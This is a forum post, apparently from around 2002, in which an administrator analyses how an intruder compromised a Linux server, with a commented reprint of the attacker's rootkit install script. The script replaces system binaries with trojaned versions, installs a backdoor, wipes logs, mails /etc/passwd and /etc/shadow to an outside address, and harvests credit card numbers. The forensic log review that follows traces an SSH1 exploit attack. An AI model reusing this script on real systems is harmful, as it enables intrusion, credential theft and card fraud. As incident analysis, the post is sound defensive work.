>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  网友文章:一Linux系统的入侵分析 
发表文章 发表涂鸦
  回复数:14  点击数:175 将此页发给您的朋友        
作者 主题: 网友文章:一Linux系统的入侵分析  回复 | 收藏 | 打印 | 篇末
痞菜帅哥哦
级别:管理员
威望:9
经验:18
货币:99999
体力:100
来源:不知道
总发帖数:2602
注册日期:2001-04-13
查看 邮件 主页 QQ 消息 引用 复制 下载 

网友文章:一Linux系统的入侵分析 我的一次入侵分析


本来也不知道自己的机器有人进来了,因为放在内部,能经过NAT进来的几乎是
不可能的,但无意登陆机器随便看看,发现有个glibc的动态库不见了,立刻到
message
那看看,什么都没有。FT,立刻启动备份机器,把硬盘拔出来,插到我的其他服务
器上检查。唉,果然。。。

[root@mail a]# la- la
bash: la-: command not found
[root@mail a]# ls -la
total 704
drwxr-xr-x 23 root root 4096 Feb 2 08:08 .
drwxr-xr-x 7 root root 4096 Feb 5 18:15 ..
drwxr-xr-x 2 root root 4096 Oct 27 1999 .automount
drwxr-xr-x 2 root root 4096 Nov 23 20:26 CVS
drwxr-xr-x 2 root root 4096 Feb 2 08:08 bin
drwxr-xr-x 2 root root 4096 Feb 3 17:55 boot
drwxr-xr-x 2 root root 4096 Nov 23 22:04 command
-rw------- 1 root root 241664 Jan 28 23:01 core
就是这里溢出啦,看来是FTP或者SSH的问题,内部实验机器,内部IP
就懒得升级,结果。。。等下再gdm你好了。

drwxr-xr-x 7 root root 36864 Feb 2 08:08 dev
-rw-r--r-- 1 root root 330646 Feb 2 08:08 eddyrk.tar.gz
真要命,直接放,搞不懂是高手失误还是只会用别人的程序。
drwxr-xr-x 38 root root 4096 Feb 4 23:23 etc
drwxr-xr-x 2 root root 4096 Nov 23 20:20 home
drwxr-xr-x 4 root root 4096 Nov 23 20:30 lib
drwxr-xr-x 2 root root 16384 Nov 23 20:20 lost+found
drwxr-xr-x 2 root root 4096 Oct 31 1999 misc
drwxr-xr-x 4 root root 4096 Nov 23 20:26 mnt
drwxr-xr-t 3 root root 4096 Nov 23 22:03 package
dr-xr-xr-x 2 root root 4096 Feb 7 1996 proc
drwxr-xr-x 2 qmails 507 4096 Dec 14 21:40 rk
就是这个rootkit!看来很多人用这个呢
drwxr-xr-x 6 root root 4096 Feb 2 23:46 root
drwxr-xr-x 3 root root 4096 Feb 2 08:08 sbin
看到这2个目录没有,已经给改动过了,不可信任。

drwxr-xr-x 2 root root 4096 Nov 23 21:40 service
drwxrwxrwt 3 root root 4096 Feb 4 23:01 tmp
drwxr-xr-x 16 root root 4096 Nov 23 20:29 usr
drwxr-xr-x 2 root root 4096 Nov 23 20:20 var
[root@mail a]# date
星期二 02 5 18:28:17 CST 2002




[root@mail rk]# cat install
#!/bin/sh
unset HISTFILE
STARTDIR=****pwd****
CARDLOG="/usr/lib/locale/ro_RO/uboot/card.log"
这个程序的作者真不是人,连别人的信用卡都偷!

SMP=****uname -a | grep smp | wc -l****
还真的没考虑过入侵需要考虑是否SMP呢
clear
echo "***** \dev\hda1****s aka Mithra****s rootkit *****"
echo "* greetz 2 bogonel and Amorph|s *"
echo "* This is the RedHat 7.0 build *"
echo "********************************************"
sleep 2
clear
echo "Please wait while Setup is preparing your directory ... "
sleep 5
clear
echo "Heh, sounds like f***in' Windoze, doesn't it ? :) "
sleep 2
clear
DIR="/usr/lib/locale/ro_RO/uboot"
mkdir -p $DIR
mkdir -p $DIR/etc

cp -f * $DIR/ >>/dev/null 少有的清空方式,这样就没办法追查INODE了。
cd $DIR

echo "Installing trojaned system files ..."

echo "[*] Process tools ..."
替换查看进程命令,FT
echo " |---ps"
chattr -aiu /bin/ps
./sz /bin/ps ps
mv -f ps /bin/ps
chattr +aiu /bin/ps
echo " | \\"
echo " | |-- done replacing ps "

sleep 1

echo " |---pstree"
chattr -aiu /usr/bin/pstree
./sz /usr/bin/pstree pstree
mv -f pstree /usr/bin/pstree
chattr +aiu /usr/bin/pstree
echo " | \\"
echo " | |-- done replacing pstree "

sleep 1

echo " |---top"
chattr -aiu /usr/bin/top
./sz /usr/bin/top top
mv -f top /usr/bin/top
chattr +aiu /usr/bin/top
echo " | \\"
echo " | |-- done replacing top "
echo " |----|"
sleep 5

echo "[*] Network tools ..."
替换网络命令,FT,毒
echo " |---netstat"
chattr -aiu /bin/netstat
./sz /bin/netstat netstat
mv -f netstat /bin/netstat
chattr +aiu /bin/netstat
echo " | \\"
echo " | |-- done replacing netstat "

sleep 1

echo " |---ifconfig"
chattr -aiu /sbin/ifconfig
./sz /sbin/ifconfig ifconfig
mv -f ifconfig /sbin/ifconfig
chattr +aiu /sbin/ifconfig
echo " | \\"
echo " | |-- done replacing ifconfig "

#echo " |---inetd"
贱啊,什么都换了

#chattr -aiu /usr/sbin/inetd
#./sz /usr/sbin/inetd inetd
#mv -f inetd /usr/sbin/inetd
#chattr +aiu /usr/sbin/inetd
#echo " | \\"
#echo " | |-- done replacing inetd "

sleep 1

echo " |---tcpd"
chattr -aiu /usr/sbin/tcpd
./sz /usr/sbin/tcpd tcpd
mv -f tcpd /usr/sbin/tcpd
chattr +aiu /usr/sbin/tcpd
echo " | \\"
echo " | |-- done replacing tcpd "
echo " |----|"
sleep 1

echo "[*] Filesystem tools ..."
换了查找命令
echo " |---find"
chattr -aiu /usr/bin/find
./sz /usr/bin/find find
mv -f find /usr/bin/find
chattr +aiu /usr/bin/find
echo " | \\"
echo " | |-- done replacing find "

sleep 1

echo " |---ls"
chattr -aiu /bin/ls
./sz /bin/ls ls
mv -f ls /bin/ls
chattr +aiu /bin/ls
echo " | \\"
echo " | |-- done replacing ls "
echo " |----|"

echo " |---dir"
chattr -aiu /usr/bin/dir
./sz /usr/bin/dir dir
mv -f dir /usr/bin/dir
chattr +aiu /usr/bin/dir
echo " | \\"
echo " | |-- done replacing dir "
echo " |----|"

sleep 1

echo "[*] System tools ..."

echo " |---syslogd"
chattr -aiu /sbin/syslogd
./sz /sbin/syslogd syslogd
mv -f syslogd /sbin/syslogd
chattr +aiu /sbin/syslogd
echo " | \\"
echo " | |-- done replacing syslog "
echo " |----|"

删除所有log文件,不过这里写得不好。
用不删除,清内容更好。
rm -f /var/log/messages
touch /var/log/messages
/etc/rc.d/init.d/syslog restart
sleep 1

echo "[*] Placing configuration files in $DIR/etc/ ..."
mv -f netstatrc $DIR/etc/netstatrc
mv -f procrc $DIR/etc/procrc
mv -f filerc $DIR/etc/filerc
mv -f logrc $DIR/etc/logrc
sleep 1

开始编译外挂进程了,还好,不是LKM
echo "[*] Trying to install ADORE ..."
if [ -x /usr/bin/gcc ];
then
echo "GCC is present"
if [ -d /usr/src/linux ];
then
if [ $SMP -eq 0 ];
then
echo "We have a machine without SMP support"
cp -f Makefile.non-smp Makefile
else
echo "This machine supports SMP"
cp -f Makefile.smp Makefile
fi
make
mv -f ava /usr/bin/weather
还改头换面呢,呵呵~~
rm -f *.c *.h Makefile*
echo "ADORE is now installed ..."
else
echo "Kernel sources are not installed. Cannot install ADORE !"
fi
else
echo "GCC is not installed. Cannot install ADORE !"
fi

echo "[*] Replacing /etc/rc.d/init.d/network with ours ..."
mv -f network /etc/rc.d/init.d/network
sleep 5
mv -f twist2open /usr/bin/
echo "[*] Starting services ..."
#echo " |---backdoor ..."
#echo " |---sniffer ..."
加了后门还开SNIFFER,哼哼
#echo " |---bnc ..."
/usr/bin/twist2open &
echo " | \\"
echo " | |-- done"
echo " |----|"
rm -f ./*pid* /*pid* /*log*
sleep 5

echo "[*] Gathering system info ..."
echo " |---uname -a"
uname -a >>file
echo " |---ifconfig"
/sbin/ifconfig >>file
echo "|------" >>file
echo " |---passwd file"
cat /etc/passwd >>file
echo " |---shadow file"
echo "|------" >>file
cat /etc/shadow >>file
哇!!!!我的密码啊!!!!!!!
echo " |---ping statistics"
ping -c 5 216.115.108.245 >>file
echo " | \\"
echo " | |-- done"
echo "[*] Fixing vulns ..."
echo " |---.bash_history"
chattr +ia /root/.bash_history
聪明!的确要佩服这个作者了
echo " |---ftpd"
chmod -s /var/ftp/*
echo " |---rpc"
chmod -s /usr/bin/rpc*
chmod -s /usr/sbin/rpc*
chmod -s /sbin/rpc*
echo " |---named"
chmod -s /var/named
所有应用程序都加上了SUID,幸亏我从来不用默认的服务的
sleep 5
echo " | \\"
echo " | |-- done"
echo " |----|"
echo "[*] Cleaning logs. This will take a while ..."
开始清除LOG,进行收尾工作。
./logcleaner ftp >>/dev/null
./logcleaner rpc >>/dev/null
./logcleaner named >>/dev/null
./logcleaner yahoo >>/dev/null
./logcleaner bind >>/dev/null
./logcleaner geocities >>/dev/null
./logcleaner hypermart >>/dev/null
./logcleaner syslogd >>/dev/null
sleep 1
echo " | \\"
echo " | |-- done"
echo " |----|"
echo "[*] Mailing system information ..."
mail -s "****uname -a****" ja_ja_j@yahoo.com <file
把所有资料都MAIL出去,毒
rm -f file
cd $STARTDIR
rm -rf ../*rh*
echo "[*] Looking for cards ..."
touch $CARDLOG
egrep -ir 'mastercard|visa' /home|egrep -v cache >>$CARDLOG
egrep -ir 'mastercard|visa' /var|egrep -v cache >>$CARDLOG
egrep -ir 'mastercard|visa' /root|egrep -v cache >>$CARDLOG
if [ -d /www ];
then
egrep -ir 'mastercard|visa' /www|egrep -v cache >>$CARDLOG
fi
这些代码就很有问题了,我在怀疑作者的人格了。
echo "Rootkit successfully installed. Enjoy !"

继续分析
[root@mail log]# cat secure
Jan 28 23:28:17 dnscache in.ftpd[2767]: connect from 192.168.100.26
Jan 28 23:28:17 dnscache in.ftpd[2767]: error: cannot execute
/usr/sbin/in.ftpd: No such file or directory
Jan 30 04:44:05 dnscache in.telnetd[3891]: connect from 192.168.100.
141
Jan 30 17:41:17 dnscache in.telnetd[4199]: connect from 211.155.24.246
Jan 31 00:52:23 dnscache login: FAILED LOGIN 1 FROM (null) FOR , User
not known to the underlying authentication module
Jan 31 19:13:57 dnscache in.telnetd[872]: connect from 192.168.100.141
Feb 1 04:03:46 dnscache in.telnetd[1143]: connect from 192.168.100.25
Feb 1 04:12:23 dnscache in.telnetd[1166]: connect from 192.168.100.25
Feb 1 07:34:10 dnscache in.telnetd[1282]: connect from 211.155.24.246
Feb 2 07:05:13 dnscache in.telnetd[1927]: connect from 218.17.238.238
Feb 2 07:16:47 dnscache in.telnetd[1928]: connect from 218.17.238.238
~~~~~~~~~~~~~~~~~~~~~~~~~~~~问题来了,那是ADSL用户,而我是在内网
,怎么可能进来的?FT,要检讨内部安全问题了。

看一下wtmp先:恩。。。正常
pts/0
chair
192.168.100.25
pts/0
pts/0
chair
192.168.100.25
pts/0
pts/0
chair
211.155.24.246
pts/0
runlevel
tty1
\<#.
tty2
tty3
\<f/
tty4
tty5
\<x0
tty6
tty1
X.\<
tty1
chair
f.\<
reboot
runlevel
tty1
LOGIN

看看FTP的记录先,最讨厌FTP进来的人,只有自己。。。删了记录?
root@mail log]# cat xferlog
Fri Nov 23 21:17:31 2001 0 192.168.100.80 36975
/home/chair/daemontools-0.76.tar.gz b _ i r chair ftp 0 *
Fri Nov 23 21:17:32 2001 0 192.168.100.80 53019
/home/chair/ucspi-tcp-0.88.tar.gz b _ i r chair ftp 0 *
Fri Nov 23 21:17:34 2001 0 192.168.100.80 85648 /home/chair/djbdns-1.
05.tar.gz b _ i r chair ftp 0 *
Fri Nov 23 21:17:35 2001 0 192.168.100.80 28416
/home/chair/qmailanalog-0.70.tar.gz b _ i r chair ftp 0 *

[root@mail ssh-scan]#pwd
/mnt/c/var/tmp/ssh-scan
[root@mail ssh-scan]# ls -la
total 32
drwxr-xr-x 8 operator root 4096 Dec 2 08:22 .
drwxrwxrwt 3 root root 4096 Feb 2 08:23 ..
drwxr-xr-x 2 operator root 4096 Dec 2 08:07 bind
drwxr-xr-x 2 operator root 4096 Dec 2 08:07 ftpd
drwxr-xr-x 2 operator root 4096 Dec 2 08:07 lpd
drwxr-xr-x 2 operator root 4096 Jun 16 2001 rpc
drwxr-xr-x 2 operator root 4096 Jun 14 2001 src
drwxr-xr-x 4 operator root 4096 Jan 21 19:57 ssh

奇怪,应该是SCAN这些东西时候留下的文件锁,看来线索
还是不少,或者这个进来的家伙太粗心了。

[root@mail mail]# pwd
/mnt/c/spool/mail

[root@mail mail]#cat root |more
太多了,垃圾日志省去大部分

From root Sun Dec 2 05:01:00 2001
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id FAA23746
for root; Sun, 2 Dec 2001 05:01:00 +0800
Date: Sun, 2 Dec 2001 05:01:00 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200112012101.FAA23746@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 12/02/01:05.01 system check


Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
*************** 问题大大的明显!!FT,我的错。
*** WARNING ***: Log file /var/log/messages is smaller than last time
checked!
*************** This could indicate tampering.
Dec 2 04:02:00 dnscache syslogd 1.3-3: restart.
Dec 2 04:02:01 dnscache syslogd 1.3-3: restart.
Dec 2 04:02:01 dnscache syslogd 1.3-3: restart.
***************
*** WARNING ***: Log file /var/log/secure is smaller than last time
checked!
*************** This could indicate tampering.
***************
*** WARNING ***: Log file /var/log/maillog is smaller than last time
checked!
*************** This could indicate tampering.


From root Sun Dec 9 04:02:01 2001
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id EAA11188
for root; Sun, 9 Dec 2001 04:02:01 +0800
Date: Sun, 9 Dec 2001 04:02:01 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200112082002.EAA11188@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: errors rotating logs

errors occured while rotating /var/log/httpd/access_log

httpd: no process killed
error running postrotate script


Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
***************
*** WARNING ***: Log file /var/log/messages is smaller than last time
checked!
*************** This could indicate tampering.
Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
***************
*** WARNING ***: Log file /var/log/secure is smaller than last time
checked!

From root Wed Jan 16 04:01:01 2002
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id EAA16976
for root; Wed, 16 Jan 2002 04:01:01 +0800
Date: Wed, 16 Jan 2002 04:01:01 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200201152001.EAA16976@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/16/02:04.01 system check


Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Jan 16 03:41:35 dnscache sshd[16485]: log: Connection from 200.184.184.
51 port 3997
Jan 16 03:41:36 dnscache sshd[16485]: fatal: Did not receive ident
string. 扫描吧,哈哈~~

From root Mon Jan 21 18:01:01 2002
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id SAA19794
for root; Mon, 21 Jan 2002 18:01:01 +0800
Date: Mon, 21 Jan 2002 18:01:01 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200201211001.SAA19794@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:18.01 ACTIVE SYSTEM ATTACK!

HOHO~~~~原来是SSH的问题,我的SSH是那个什么破STARLINUX自带的,
1.X吧,因为是实验机器,懒得升级,FT。问题来了
Active System Attack Alerts
=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jan 21 17:39:18 dnscache sshd[18176]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:04 dnscache sshd[18224]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
attack: network attack detected
Security Violations
=-=-=-=-=-=-=-=-=-=
Jan 21 17:39:18 dnscache sshd[18176]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:04 dnscache sshd[18224]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:50 dnscache sshd[18290]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:53 dnscache sshd[18293]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:57 dnscache sshd[18294]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:00 dnscache sshd[18297]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:03 dnscache sshd[18300]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:07 dnscache sshd[18303]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:10 dnscache sshd[18304]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:18 dnscache sshd[18310]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:35:47 dnscache sshd[18052]: log: Connection from 141.108.9.
13 port 4639
Jan 21 17:35:47 dnscache sshd[18053]: log: Connection from 141.108.9.
13 port 4648
Jan 21 17:35:49 dnscache sshd[18053]: fatal: Local: Your ssh version
is too old and is no longer supported. Pl
ease install a newer version.
原来是这个家伙!但IP很古怪,是不是肉鸡??
Jan 21 17:35:49 dnscache sshd[18056]: log: Connection from 141.108.9.
13 port 4651
Jan 21 17:36:36 dnscache sshd[18075]: log: Connection from 141.108.9.
13 port 4674
Jan 21 17:36:39 dnscache sshd[18078]: log: Connection from 141.108.9.
13 port 4676
Jan 21 17:36:42 dnscache sshd[18078]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:36:43 dnscache sshd[18079]: log: Connection from 141.108.9.
13 port 4679
Jan 21 17:36:46 dnscache sshd[18082]: log: Connection from 141.108.9.
13 port 4682
Jan 21 17:36:49 dnscache sshd[18082]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:36:50 dnscache sshd[18085]: log: Connection from 141.108.9.
13 port 4685
Jan 21 17:36:53 dnscache sshd[18085]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:36:53 dnscache sshd[18088]: log: Connection from 141.108.9.
13 port 4687
Jan 21 17:36:57 dnscache sshd[18089]: log: Connection from 141.108.9.
13 port 4690
Jan 21 17:37:00 dnscache sshd[18089]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:00 dnscache sshd[18092]: log: Connection from 141.108.9.
13 port 4692
Jan 21 17:37:04 dnscache sshd[18095]: log: Connection from 141.108.9.
13 port 4694
Jan 21 17:37:07 dnscache sshd[18095]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:08 dnscache sshd[18096]: log: Connection from 141.108.9.
13 port 4697
Jan 21 17:37:12 dnscache sshd[18099]: log: Connection from 141.108.9.
13 port 4699
Jan 21 17:37:24 dnscache sshd[18099]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:25 dnscache sshd[18106]: log: Connection from 141.108.9.
13 port 4705
Jan 21 17:37:28 dnscache sshd[18106]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:28 dnscache sshd[18109]: log: Connection from 141.108.9.
13 port 4708
Jan 21 17:37:28 dnscache sshd[18106]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:28 dnscache sshd[18109]: log: Connection from 141.108.9.
13 port 4708
Jan 21 17:37:31 dnscache sshd[18109]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:32 dnscache sshd[18110]: log: Connection from 141.108.9.
13 port 4712
Jan 21 17:37:36 dnscache sshd[18113]: log: Connection from 141.108.9.
13 port 4713
Jan 21 17:37:40 dnscache sshd[18116]: log: Connection from 141.108.9.
13 port 4715
Jan 21 17:37:43 dnscache sshd[18116]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:43 dnscache sshd[18119]: log: Connection from 141.108.9.
13 port 4719
Jan 21 17:37:47 dnscache sshd[18120]: log: Connection from 141.108.9.
13 port 4720
Jan 21 17:37:51 dnscache sshd[18123]: log: Connection from 141.108.9.
13 port 1265Jan 21 17:41:12 dnscache sshd[18236]: log: Connection from
141.108.9.13 port 2326
Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:19 dnscache sshd[18241]: log: Connection from 141.108.9.
13 port 2762
Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:26 dnscache sshd[18244]: log: Connection from 141.108.9.
13 port 4015
Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:33 dnscache sshd[18247]: log: Connection from 141.108.9.
13 port 4017
Jan 21 17:41:40 dnscache sshd[18252]: log: Connection from 141.108.9.
13 port 4019
Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:52 dnscache sshd[18257]: log: Connection from 141.108.9.
13 port 1049
Jan 21 17:41:59 dnscache sshd[18262]: log: Connection from 141.108.9.
13 port 1051
Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:07 dnscache sshd[18265]: log: Connection from 141.108.9.
13 port 1945
Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:14 dnscache sshd[18270]: log: Connection from 141.108.9.
13 port 3191
Jan 21 17:42:23 dnscache sshd[18273]: log: Connection from 141.108.9.
13 port 4027
Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:26 dnscache sshd[18276]: log: Connection from 141.108.9.
13 port 1110
Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:30 dnscache sshd[18279]: log: Connection from 141.108.9.
13 port 1557
Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:33 dnscache sshd[18280]: log: Connection from 141.108.9.
13 port 2124
Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:36 dnscache sshd[18283]: log: Connection from 141.108.9.
13 port 2630
Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:40 dnscache sshd[18286]: log: Connection from 141.108.9.
13 port 3184
Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:43 dnscache sshd[18287]: log: Connection from 141.108.9.
13 port 3915
Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:47 dnscache sshd[18290]: log: Connection from 141.108.9.
13 port 3918
an 21 17:43:01 dnscache sshd[18300]: log: Connection from 141.108.9.13
port 1033
Jan 21 17:43:03 dnscache sshd[18300]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:04 dnscache sshd[18303]: log: Connection from 141.108.9.
13 port 1034
Jan 21 17:43:07 dnscache sshd[18303]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:08 dnscache sshd[18304]: log: Connection from 141.108.9.
13 port 1036
Jan 21 17:43:10 dnscache sshd[18304]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:11 dnscache sshd[18307]: log: Connection from 141.108.9.
13 port 1586
Jan 21 17:43:14 dnscache sshd[18307]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:43:15 dnscache sshd[18310]: log: Connection from 141.108.9.
13 port 2150
Jan 21 17:43:18 dnscache sshd[18310]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:18 dnscache sshd[18311]: log: Connection from 141.108.9.
13 port 2665
Jan 21 17:43:22 dnscache sshd[18314]: log: Connection from 141.108.9.
13 port 3162
Jan 21 17:43:30 dnscache sshd[18319]: log: Connection from 141.108.9.
13 port 4975
Jan 21 17:43:34 dnscache sshd[18320]: log: Connection from 141.108.9.
13 port 1512

从开始连接到溢出只是用了10来分钟,看来SSH1.X不能用了。
Jan 21 17:45:48 dnscache sshd[18052]: fatal: Timeout before
authentication.
Jan 21 17:47:37 dnscache adduser[18423]: new user: name=cgi, uid=0,
gid=0, home=/home/cgi, shell=/bin/bash
加帐号了,5~~~~~
Jan 21 17:47:52 dnscache PAM_pwdb[18426]: password for (cgi/0) changed
by ((null)/0)
Jan 21 17:48:00 dnscache PAM_pwdb[18433]: password for (operator/11)
changed by ((null)/0)
干吗改自己的密码呢?有问题。
Jan 21 17:48:18 dnscache sshd[18442]: log: Connection from 80.96.178.195
port 1465
Jan 21 17:48:20 dnscache sshd[18442]: log: Could not reverse map address
80.96.178.195.
Jan 21 17:48:28 dnscache sshd[18442]: log: Password authentication for
operator accepted.
Jan 21 17:49:12 dnscache sshd[18484]: log: Connection from 80.96.178.194
port 2274
Jan 21 17:49:12 dnscache sshd[18484]: log: Could not reverse map address
80.96.178.194.
Jan 21 17:49:20 dnscache sshd[18484]: log: Password authentication for
operator accepted.
情况很明显了,用了多个IP干活,能确定是肉鸡了,FT。
Jan 21 17:50:30 dnscache sshd[18484]: fatal: Read error from remote
host: Connection reset by peer
Jan 21 17:51:08 dnscache sshd[18555]: log: Connection from 80.96.178.194
port 2281
Jan 21 17:51:08 dnscache sshd[18555]: log: Could not reverse map address
80.96.178.194.
Jan 21 17:51:19 dnscache sshd[18555]: log: Password authentication for
operator accepted.
Jan 21 17:58:11 dnscache sshd[18442]: fatal: Read error from remote
host: Connection reset by peer
by dnscache.i-168.com (8.9.3/8.9.3) id TAA23666
for root; Mon, 21 Jan 2002 19:01:01 +0800
Date: Mon, 21 Jan 2002 19:01:01 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200201211101.TAA23666@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:19.01 system check


Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Jan 21 18:17:41 dnscache sshd[270]: log: Generating new 768 bit RSA
key.
Jan 21 18:17:41 dnscache sshd[270]: log: RSA key generation complete.
Jan 21 19:00:16 dnscache sshd[23334]: log: Connection from 80.96.178.195
port 1519
Jan 21 19:00:16 dnscache sshd[23334]: log: Could not reverse map address
80.96.178.195.
Jan 21 19:00:25 dnscache sshd[23334]: log: Password authentication for
operator accepted.

From root Mon Jan 21 20:01:02 2002
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id UAA29460
for root; Mon, 21 Jan 2002 20:01:01 +0800
Date: Mon, 21 Jan 2002 20:01:01 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200201211201.UAA29460@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:20.01 system check


Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Jan 21 19:01:54 dnscache sshd[23334]: fatal: Read error from remote
host: Connection reset by peer
Jan 21 19:13:33 dnscache sshd[23975]: log: Connection from 80.96.178.194
port 2406
Jan 21 19:13:33 dnscache sshd[23975]: log: Could not reverse map address
80.96.178.194.
Jan 21 19:13:44 dnscache sshd[23975]: log: Password authentication for
operator accepted.
Jan 21 19:17:41 dnscache sshd[270]: log: Generating new 768 bit RSA
key.
有新机器进来呢,FT,不是好兆头

